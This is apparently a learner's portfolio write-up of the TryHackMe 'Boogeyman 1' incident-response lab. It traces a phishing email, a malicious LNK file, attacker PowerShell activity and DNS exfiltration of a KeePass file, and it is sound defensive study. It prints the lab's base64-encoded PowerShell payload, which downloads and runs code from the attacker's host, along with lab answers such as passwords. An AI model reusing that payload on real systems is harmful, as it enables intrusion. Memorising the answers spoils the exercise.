~/portfolio / write-ups / boogeyman-1
TryHackMe Malware Analysis & Incident Response Medium Apr '26

Boogeyman 1

Investigated a targeted phishing attack against a logistics company's finance team. Traced a malicious LNK file delivered via encrypted ZIP, decoded an obfuscated PowerShell payload, and uncovered credential exfiltration via DNS tunneling using nslookup.

Medium
Difficulty
100%
Completion
TryHackMe
Platform
TOOLS USED
lnkparse
Wireshark
tshark
KeePass
CyberChef
01

Stage 1

Q1. What is the email address used to send the phishing email?

let's first examine the artifacts,

email header artifact

from this header we know that the email came from

sender field showing agriffin@bpakcaging.xyz
Answer: agriffin@bpakcaging.xyz
Q2. What is the email address of the victim?

basing on the header, we know that the victim's email address is julianne.westcott@hotmail.com

Answer: julianne.westcott@hotmail.com
Q3. What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?

the email header shows this:

DKIM-Signature header

the List-Unsubscribe header shows this:

List-Unsubscribe header showing elasticemail
Answer: elasticemail
Q4. What is the name of the file inside the encrypted attachment?

upon checking the body of the email, we see this

email body showing encrypted ZIP attachment

so we open the invoice.zip file and see what file is inside the zip file.

ZIP contents showing Invoice_20230103.lnk
Answer: Invoice_20230103.lnk
Q5. What is the password of the encrypted attachment?

so we know that the password was in the email's body.

email body showing password Invoice2023!
Answer: Invoice2023!
Q6. Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?

by using lnkparse, we are able to get what this file is going to do.

lnkparse output showing command line arguments with base64 payload

in order to do so, let's find out what this encoded command is.

CyberChef decoding the base64 — decoded PowerShell downloading from files.bpakcaging.xyz

however, the question is looking for the encoded payload so we have to answer the base64 version.

Answer: QBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
02

Stage 2

Q1. What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order.

right now we have powershell history of infected host. let's visit what it has.

PowerShell history logs overview

lots of information, the valuable one we can use to answer this question is the EventID but let's try sorting this first by timestamp to see what were the first few commands done.

we know that the file hosting domain is http://files.bpakcaging.xyz/update since that's where the attacker got the file in the encoded command in the lnk file. but we also got this interesting log directing traffic to cdn.bpakcaging.xyz

log entry showing cdn.bpakcaging.xyz C2 traffic
Answer: cdn.bpakcaging.xyz, files.bpakcaging.xyz
Q2. What is the name of the enumeration tool downloaded by the attacker?
logs showing sb.exe download and Seatbelt string in output

so we know that the attacker downloaded sb.exe and started collecting information about the system and the users.

then we see "Seatbelt" suddenly. sb = seatbelt. an acronym.

Answer: Seatbelt
Q3. What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.

basing on the screenshot on the previous question we know that the attacker launched sq3 in the Music folder before accessing the Appdata. tracing back the change directories command we see this

cd command chain leading to plum.sqlite in Sticky Notes AppData path
Answer: C:\\Users\\j.westcott\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite
Q4. What is the software that uses the file in Q3?

it used Microsoft Sticky Notes, we can see this based on the command.

sq3.exe command against plum.sqlite showing Sticky Notes path
Answer: Microsoft Sticky Notes
Q5. What is the name of the exfiltrated file?

upon closer inspection we were able to see this, we only found this out by reviewing the logs past the sq3.exe execution.

log showing protected_data.kdbx being staged for exfiltration
Answer: protected_data.kdbx
Q6. What type of file uses the .kdbx file extension?

upon a quick google search, we were able to determine that Keepass uses it.

Answer: KeePass
Q7. What is the encoding used during the exfiltration attempt of the sensitive file?

we know the variable it set for the IP of the destination is $destination, querying that we see this

$destination variable query result

we see that hex is used here

hex encoding used in exfiltration command
Answer: hex
Q8. What is the tool used for exfiltration?

basing on the earlier screenshot we found. it used nslookup to resolve the ip of the domain.

Answer: nslookup
03

Stage 3

Q1. What software is used by the attacker to host its presumed file/payload server?

so we know it's using files.bpakcaging, let's try and filtering the network capture for that.

Wireshark filter for files.bpakcaging.xyz

we see this

HTTP server banner showing Python
Answer: Python
Q2. What HTTP method is used by the C2 for the output of the commands executed by the attacker?

we know the c2 is using cdn.bpakcaging. filtering that we can see that it's actually using POST for the output commands.

Answer: POST
Q3. What is the protocol used during the exfiltration activity?

we know that it was using nslookup.

Answer: DNS
Q4. What is the password of the exfiltrated file?

in the past stages, we know only that it got something from the NOTE table. following that stream we get something like this.

DNS stream showing obfuscated base64 message

an obfuscated message. decoding that gives us this:

CyberChef decoding output showing %p9^3!lL^Mz47E2GaT^y
Answer: %p9^3!lL^Mz47E2GaT^y
Q5. What is the credit card number stored inside the exfiltrated file?

from the hint it said we need to use tshark. to get cleaner results, let's only get the packets during the extraction.

tshark command filtering for DNS exfiltration packets

now we are getting somewhere. however there is a lot of noise here.

tshark output with noise — partial data visible

let's use the password that we discovered on the previous question

KeePass database opened showing credit card 4024007128269551
Answer: 4024007128269551
Key Takeaways
  • LNK files work because they look like nothing. hiding the password inside the email body is the kind of thing you'd skip right past without thinking twice
  • nslookup doing DNS exfiltration just blends in. you only catch it if you were already watching outbound DNS traffic before it happened
  • Sticky Notes stores data in a SQLite database. not something you'd guess, but now it's on my checklist for any compromised host
  • sometimes you just have to go through the logs line by line after a key binary runs. slow, but that's how i figured out what sq3.exe was actually doing

overall: great room. stage 2 tripped me up for a while because i couldn't figure out what the extracted file actually was. only found it by going through the logs manually after sq3.exe ran, which took longer than i'd like to admit. tshark was also new territory, had to lean on AI to get the query right. solid capstone though. genuinely enjoyed it.

← Back All Write-ups Next → Boogeyman 2